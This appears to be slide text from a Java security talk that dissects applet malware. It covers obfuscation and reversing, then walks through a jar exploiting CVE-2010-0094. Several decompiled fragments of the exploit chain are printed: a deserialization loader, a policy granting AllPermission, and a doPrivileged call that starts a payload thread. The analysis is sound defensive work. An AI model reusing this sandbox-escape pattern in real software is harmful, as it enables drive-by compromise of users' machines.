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Dissecting Java SE Malware. Marc Schönefeld Java Vulnerability Team. Agenda. Malware in a nutshell Obfuscation techniques Reversing Examples Mitigation. Graphic Section Divider.
Dissecting Java SE Malware Marc Schönefeld Java Vulnerability Team
Agenda • Malware in a nutshell • Obfuscation techniques • Reversing • Examples • Mitigation
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Malware Definition (US-CERT) • Short for malicious software • Programming (code, scripts, active content, and other software) • designed to disrupt or deny operation, gather information that leads to • loss of privacy or exploitation, gain unauthorized access to system resources, and other abusive behavior www.us-cert.gov/control_systems/pdf/undirected_attack0905.pdf • Adware, Banking trojans, dialers, license/password stealers, ...
Malware and Applet Security (before JDK 7u21) Dangerous applet runtime modes http://docs.oracle.com/javase/tutorial/deployment/applet/security.html • Self-signed applets (signed with a developer certificate) • Can run with elevated privileges if victim allows • The attacker uses social engineering techniques topersuade victim that the appletis trustworthy • Unsigned applets • Start in sandboxed mode • The attacker needs to exploit a JVM vulnerability to elevated privileges
Java and Malware Context of malware: Drive-by-infections • A harmless looking unsigned applet can turn out to be malware, activated by • Integrating a link to a malware jar in an HTML page • In a short URL or a phishing mail to a an infected host • In a malicious advertisement served to a legitimate website • Finding a victim that did not apply the updates for the latest JRE version • Good reason to always update to latest secure baseline • Btw, 3rd-party software should not require an insecure version of Java, if so ask vendor to fix it
Malware Exploitation strategy • In the browser plugin, the security manager is enabled by default • Therefore disabling/bypassing the security manager is the primary goal of the malware ("Jumping out of the sandbox"), either by: • Finding an exploitable programming error in privileged code or • Finding a native method that does not check parameters correctly to provoke a native code vulnerability
The Attacker, the victim, and the JRE • Visits malicious websites • Runs outdated VM • Tricked by social engineering • Uses Social Engineering • Knows vulnerabilities • Launches targeted or broad attack Victim Attacker Java-based Malware JRE • Latest (secure) VM for download • CPU, Security alerts • Defensive Security Levels
Exploits as a Service Blackhole, Phoenix, Robopak, etc.
Malware being watched Websites that monitor malware candidates (urlquery.net)
Malware Components • Malware can be often be divided into the following components • Code parts that exploit vulnerabilities in the local protection mechanisms • To bypass the security manager via a native vulnerability • To disable the security manager via a vulnerability in trusted Java code • Code parts that contain the actual malicious payload • Attacker could also execute malicious action in the applet JVM • But the Applet lifecycle could be too short for that to complete • Attackers prefer native malware components (better control over OS)
Malware activation Distribution model (technical and monetary) Infected site Victim Traffic Malware MWPackAuthor Malware Pack A Malware Pack B Payment Remote Control Fake Antivirus Password Stealer
Obfuscation Why attackers obfuscate their malicious Java binaries • Obfuscation creates polymorphic copies from a given master copy • Circumvents detection by blacklists simply based on checksums • Obfuscation disguises control flow • makes it harder for analysts to understand behavior • Effort for manual analysis prolongs lifetime of malware even after being detected
Obfuscation Techniques used • Identifier Name Mangling • The JVM does not need useful names for Methods and Fields • They can be renamed to single letter identifiers • Constant Pool Name Mangling • Decrypts constant pool entries on runtime • Control flow obfuscation • Insertion of phantom variables, stack scrambling • And by relying on their default values inserting ghost branch instructions, which never execute
Obfuscation Implications • Constant value mangling • Requires extra processing with call of an deobfuscation method • in each retrieval from constant pool • Dynamic class loading may become broken • as classes get new names and reflection calls like class.forName(„Hello“) will fail • because class „Hello“ may now only be known by an obfuscated name • Obfuscation breaks patterns that can be recognized by the JVM for optimization (less a concern for an attacker)
Obfuscating Java Code The sourcecode publicclassHello { publicstaticvoidmain(String[] args) { String[] TOTD = {“Hello",“Java",“One"}; for (int i = 0; i < TOTD.length; i++) { newHello(TOTD[i]); } } publicHello(String a) { System.out.println(a.toUpperCase()); } }
Bytecode trickery Methodsthatonlydifferwiththereturn type If the decompiled source is compiled again: • The signatures are considered duplicate in the Java language • But valid in JVM bytecode, and therefore can be used in obfuscation techniques >javac -classpath . overload.java overload.java:15: jvmoverload() is already defined in overload static double jvmoverload() ^ 1 error
Malware Analysis Reverse Engineering Malware(Reversing) • Disassembling • Retrieve and analyze bytecodeinstructions from class files • Decompilation • Rediscover source code from class files • Graphical Analysis • Rebuild the logical control flow of methods
Decompilation • Typical decompilation steps • Rebuild control flow from code segments, • Match flow patterns to java language constructs • Associate constants and external references from constant pool entries • Decompiled code is not always correct Java code • Javac applies stricter rules than the JVM • Invalid Java language identifiers in constant pool (accepted by the JVM)
Decompilers • JAD (http://www.varaneckas.com/jad) • Stopped development with version 1.5.8g • Doesn‘t understand some newer language features, Command-line-only • JD-GUI (http://jd.benow.ca) • Standalone GUI and decompilerplugin for Eclipse • Convenient "Save all" sources feature • Empirical Study • http://jameshamilton.eu/sites/default/files/JavaBytecodeDecompilerSurveyExtended.pdf
Disassembling Disassemble Classfiles with Javap • Features • Shows classinternals • Disassemble Bytecode • Options • private (show all fields and members) • c (disassemble class)
Graphical Analysis Overview • All Java Classfiles have to be compliant to the JVM specification • Obfuscation should better not break this otherwise verification fails • Effective control flow can be interleaved with fake code in an obfuscated class file • A graph can reveal the original control flow • Structures and dependencies can be discovered by graphical analysis • Several methods of original code may be blended in obfuscated target
Graphical Analysis Procedure • Walk through a specific code attribute of methods in a class file • Retrieve target instructions • Calculate control blocks • Calculate successor relationships • Rebuild control flow • Export control flow graph (CFG) to a graph markup language • Display the generated file with the control flow
Graphical Analysis IDA Pro
Examples „Longum iter est per praecepta, breve et efficax per exempla.“Seneca
Malware Analysis: The Payload Example 1, Payload is provided in an unsigned applet ] unzip -t j.jar Archive: j.jar testing: META-INF/ OK testing: META-INF/MANIFEST.MF OK testing: CustomClass.class OK testing: CustomClassLoaderRepository.class OK testing: CustomMBeanServer.class OK testing: dostuff.class OK testing: ipwn.class OK testing: mosdef.class OK testing: SiteError.class OK testing: SuperPolicy.class OK testing: naxui.ser OK
Malware Analysis: The Payload We find manifest info, class files and others ] unzip -t j.jar Archive: j.jar testing: META-INF/ OK testing: META-INF/MANIFEST.MF OK testing: CustomClass.class OK testing: CustomClassLoaderRepository.class OK testing: CustomMBeanServer.class OK testing: dostuff.class OK testing: ipwn.class OK testing: mosdef.class OK testing: SiteError.class OK testing: SuperPolicy.class OK testing: naxui.ser OK
Malware Analysis: The Payload ] xxd –g0 naxui.ser | awk '{$1="";print}' aced0005737200196a6176612e726d69 ....sr..java.rmi 2e4d61727368616c6c65644f626a6563 .MarshalledObjec 747cbd1e97ed63fc3e02000349000468 t|....c.>...I..h 6173685b00086c6f6342797465737400 ash[..locBytest. 025b425b00086f626a42797465737100 .[B[..objBytesq. 7e00017870e209b63b70757200025b42 ~..xp...;pur..[B acf317f8060854e00200007870000000 ......T....xp... 20aced00057372000b437573746f6d43 ....sr..CustomC 6c6173732123456789abcdef02000078 lass!#Eg.......x 70 p • The file contains a serialized object (0xACED0005 magic) • This is a hint that the malware is trying to exploit a serialization vulnerability • It is a serialized instance of java.rmi.MarshalledObject, as suggested by the class name • CustomClass is a serializable class supplied in the jar file • What's inside naxui.ser?
Malware Analysis: The Payload We find manifest info, class files and serialized objects ] unzip -t j.jar Archive: j.jar testing: META-INF/ OK testing: META-INF/MANIFEST.MF OK testing: CustomClass.class OK testing: CustomClassLoaderRepository.class OK testing: CustomMBeanServer.class OK testing: dostuff.class OK testing: ipwn.class OK testing: mosdef.class OK testing: SiteError.class OK testing: SuperPolicy.class OK testing: naxui.ser OK
Malware Analysis ] grep java/applet/Applet *.class Binary file SiteError.class matches publicclassSiteErrorextends Applet { • Simple grep for the text "java/applet/Applet" should find the Applet entry point • Processing will start in class SiteError • Finding the entry point
Malware Analysis publicvoid init() { host = getParameter((new StringBuilder()). append("UeHlurk".substring(4, 6)). append("3Pk44ljb".substring(5,6)).toString()); s_port = "67K80mFPsU".substring(3, 5); if (host == null) host = (newStringBuilder()). append("tZa127P7".substring(3, 6)) append("g1d85.0.W1".substring(5,8)). append("30.bbH".substring(1, 3)). append("nZ1Q".substring(2,3)). toString(); • Let's decompile SiteError.class for more information • Bootstrapping in init()
Malware Analysis publicvoid init() { host = getParameter((new StringBuilder()). append("UeHlurk".substring(4, 6)). append("3Pk44ljb".substring(5,6)).toString()); s_port = "67K80mFPsU".substring(3, 5); if (host == null) host = (newStringBuilder()). append("tZa127P7".substring(3, 6)) append("g1d85.0.W1".substring(5,8)). append("30.bbH".substring(1, 3)). append("nZ1Q".substring(2,3)). toString(); • Let's decompile SiteError.class for more information • Variable host is taken from the parameter "url", Port is "80" , if the parameter lookup fails the default value is "" • Bootstrapping in init()
Malware Analysis • Hint: • Fast understanding of decompiled code snippets with a scripting language of your choice • But make sure you only evaluate safe functions (or turn on the security manager)
Malware Analysis RMIConnectionImplrmiconnectionimpl = newRMIConnectionImpl(rmijrmpserverimpl, (newStringBuilder()). append("QTdmyMJ".substring(3, 5)). append("Hrmg6Dd7".substring(1, 3)). append("QJDic2zra".substring(3, 5)). append("EQ2MimpEaV".substring(4, 7)). append("uWLklzr8a".substring(4, 5)).toString(), (ClassLoader) null, (Subject) null, (Map) null); • Similar approach for the RMIConnectionImpl instance • The attacker obfuscated the string "myrmicimpl" which is used as the name of the connection id • Finding hints to the root cause
Malware Analysis Intermediate Results: The root cause • CVE-2010-0094 aka "Runtime RMIConnectionImpl Privileged Context Remote Code Execution Vulnerability", is the bug behind the malware http://archive.cert.uni-stuttgart.de/bugtraq/2010/04/msg00039.html • Root cause is the privileged deserialization of a marshalled object and the consecutive dispatch of the wrapped CustomClassobject with AllPermissions granted • As a consequence the attacker can disabled the security manager and launch arbitrary malicious code • The bug was fixed in JDK 6u19, http://hg.openjdk.java.net/jdk6/jdk6-gate/jdk/rev/4509549ab091
Malware Analysis, the control flow • publicclassCustomClassextendsSecureClassLoaderimplementsSerializable { • The attacker loads a serialized instance of CustomClassvia RMI • As CustomClass is serializable , interesting stuff is likely to be found in the readObject method • So far we know
Malware Analysis, the control flow privatevoidreadObject(ObjectInputStreamois) { Class c1 = autoLoadClass((newStringBuilder()) .append("YjwSmosze".substring(4,7)) .append("LmlbdefS".substring(4,7)).toString()); String s = SiteError.host; inti = Integer.parseInt(SiteError.s_port); Constructor cons = c1.getConstructor(new Class[]{s.getClass(), Integer.TYPE }); Object obj = cons.newInstance( new Object[] {s, new Integer(i) }); Class c2 = autoLoadClass((newStringBuilder()) .append("h8pecipwfPt".substring(5, 8)) .append("BFQnlmUm".substring(3,4)).toString()); Constructor cons1 = c2.getConstructor(new Class[] {c1}); Object obj1 = cons1.newInstance(new Object[] { obj }); • CustomClass inside the MarshalledObject is deserialized • It calls autoLoadClass, which takes a string, appends the string ".class" and loads a class file with that name from the jar • The first class loaded is mosdef, an instance is created, which is fed into a new instance of ipwn • Deserialisation
Malware Analysis, the control flow classSuperPolicyextends Policy { publicPermissionCollectiongetPermissions(CodeSourcecodesource) { Permissions permissions = newPermissions();permissions.add(newAllPermission()); return permissions; } [..] } • It provides a non-restrictive policy • With a permission collection required for a full privilege execution scenario (AllPermission) • What does SuperPolicy do?
Malware Analysis, the control flow publicclassmosdefimplementsPrivilegedAction { public Object run() { try { Policy.setPolicy( newSuperPolicy()); } catch (SecurityExceptionsecurityexception) {} ( new Thread( newdostuff(host))).start(); return null; } • Sets a permission collection required for full privilege execution (SuperPolicy) • Executes doStuff in a new thread • What is mosdef.class for?
Malware Analysis, the control flow publicclassipwn { publicipwn(mosdefmos) { AccessController.doPrivileged(mos); } • mosdef is an instance of PrivilegedAction • Is executed with doPrivileged • How is ipwn.class used?
Malware Analysis, the control flow classdostuffimplementsRunnable { public String dfghj; public String ename; publicdostuff(String s) { dfghj = s; } publicvoidnbfd(String s) throwsIOException {..} // load bytestream from URL to a given file public String runcommand(String s) {[…] } publicvoid run() {[…] } } • Is a Runnable with several declarations • Takes a filename as input parameter in constructor • Implementation is started in the runmethod • What does doStuff do?